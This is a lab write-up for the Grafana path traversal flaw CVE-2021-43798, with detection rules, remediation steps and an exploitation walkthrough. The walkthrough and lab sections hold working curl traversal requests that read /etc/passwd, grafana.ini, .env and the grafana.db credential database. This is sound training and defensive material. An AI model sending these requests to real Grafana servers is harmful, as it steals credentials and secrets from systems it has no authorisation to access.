CVE-2021-43798: Grafana Path Traversal Vulnerability
Executive Summary
CVE-2021-43798 is a critical path traversal vulnerability affecting Grafana versions 8.0.0-beta1 through 8.3.0. This vulnerability allows unauthenticated remote attackers to read arbitrary files from the Grafana server by exploiting improper input validation in plugin routes.
| Attribute | Value |
|---|---|
| CVE ID | CVE-2021-43798 |
| CVSS Score | 7.5 (HIGH) |
| Attack Vector | Network |
| Complexity | Low |
| Authentication | None Required |
| Impact | Confidentiality (High) |
Technical Deep Dive
Vulnerability Mechanism
The vulnerability exists in Grafana's plugin API endpoint. When a request is made to /public/plugins/<plugin-id>/../../../etc/passwd, Grafana fails to properly sanitize the path, allowing directory traversal sequences (../) to escape the plugin directory and access arbitrary files on the filesystem.
Affected Versions
- Grafana 8.0.0-beta1 through 8.3.0
- Fixed in versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7
Root Cause
The vulnerability stems from insufficient path validation in the getPluginAssets function. The code did not properly sanitize user input before constructing file paths, allowing attackers to use path traversal sequences.
Exploitation Walkthrough
Prerequisites
- Network access to Grafana instance on port 3000
- Grafana version between 8.0.0-beta1 and 8.3.0
Step 1: Identify Target
First, confirm the target is running a vulnerable Grafana version:
curl -s http://target:3000/api/health
Step 2: Enumerate Installed Plugins
List available plugins that can be used as the traversal entry point:
# Common default plugins
curl -s "http://target:3000/public/plugins/grafana-clock-panel/../../../etc/passwd"
curl -s "http://target:3000/public/plugins/alertlist/../../../etc/passwd"
Step 3: Extract Sensitive Files
Read the Grafana configuration file which often contains database credentials:
# Read grafana.ini configuration
curl -s "http://target:3000/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini"
# Read environment file
curl -s "http://target:3000/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/.env"
# Read database credentials
curl -s "http://target:3000/public/plugins/grafana-clock-panel/../../../../../../../var/lib/grafana/grafana.db"
Step 4: Extract Secrets
The Grafana database often contains:
- Admin credentials (hashed)
- API keys
- Data source credentials (potentially in plaintext)
- Alert notification webhooks
Lab Environment
Starting the Lab
cd labs/CVE-2021-43798
docker-compose -f docker-compose.lab.yml up -d
Accessing the Lab
- Grafana Target: http://localhost:3000
- Attacker Container:
docker exec -it attacker bash
Exploitation Commands
From the attacker container:
# Test basic file read
curl "http://target:3000/public/plugins/grafana-clock-panel/../../../etc/passwd"
# Read Grafana secrets
curl "http://target:3000/public/plugins/grafana-clock-panel/../../../etc/grafana/grafana.ini" | grep -A5 "security"
Detection & Monitoring
YARA Rule
rule CVE_2021_43798_Grafana_PathTraversal {
meta:
description = "Detects CVE-2021-43798 Grafana path traversal attempts"
author = "ilovethreats"
cve = "CVE-2021-43798"
strings:
$uri1 = "/public/plugins/" nocase
$traversal = "../"
$etc = "/etc/" nocase
$grafana = "grafana" nocase
condition:
$uri1 and $traversal and ($etc or $grafana)
}
Sigma Rule
title: Grafana CVE-2021-43798 Path Traversal
id: a1b2c3d4-1234-5678-abcd-ef1234567890
status: production
description: Detects exploitation attempts of CVE-2021-43798 Grafana path traversal
references:
- https://nvd.nist.gov/vuln/detail/CVE-2021-43798
- https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
logsource:
category: webserver
product: nginx
detection:
selection:
cs-uri-stem|contains:
- '/public/plugins/'
cs-uri-stem|contains:
- '../'
condition: selection
falsepositives:
- Legitimate plugin requests (rare)
level: high
tags:
- attack.initial_access
- attack.t1190
- cve.2021.43798
Network Detection
Monitor for HTTP requests matching:
- URI path containing
/public/plugins/AND../ - Requests attempting to access
/etc/,/var/, or/proc/
Remediation
Immediate Actions
- Upgrade Grafana to version 8.3.1+ (or appropriate patched version for your branch)
- Restrict network access to Grafana if public-facing
- Review access logs for exploitation attempts
Patching
# For Debian/Ubuntu
sudo apt update && sudo apt install grafana=8.3.1
# For Docker
docker pull grafana/grafana:8.3.1
Workarounds (if patching not immediately possible)
- Reverse proxy filtering: Block requests containing
..in the path - WAF rules: Deploy rules to detect path traversal attempts
- Network segmentation: Limit access to trusted networks only
Impact Assessment
What Attackers Can Access
/etc/passwd- System user enumeration/etc/grafana/grafana.ini- Database credentials, secret keys/var/lib/grafana/grafana.db- SQLite database with credentials/proc/self/environ- Environment variables with secrets- SSH keys, cloud credentials, and other sensitive files
Real-World Exploitation
This vulnerability was actively exploited in the wild within days of disclosure. Attackers used it to:
- Steal database credentials for lateral movement
- Extract API keys for cloud services
- Enumerate internal network information
References
This lab is provided for educational and authorized security testing purposes only.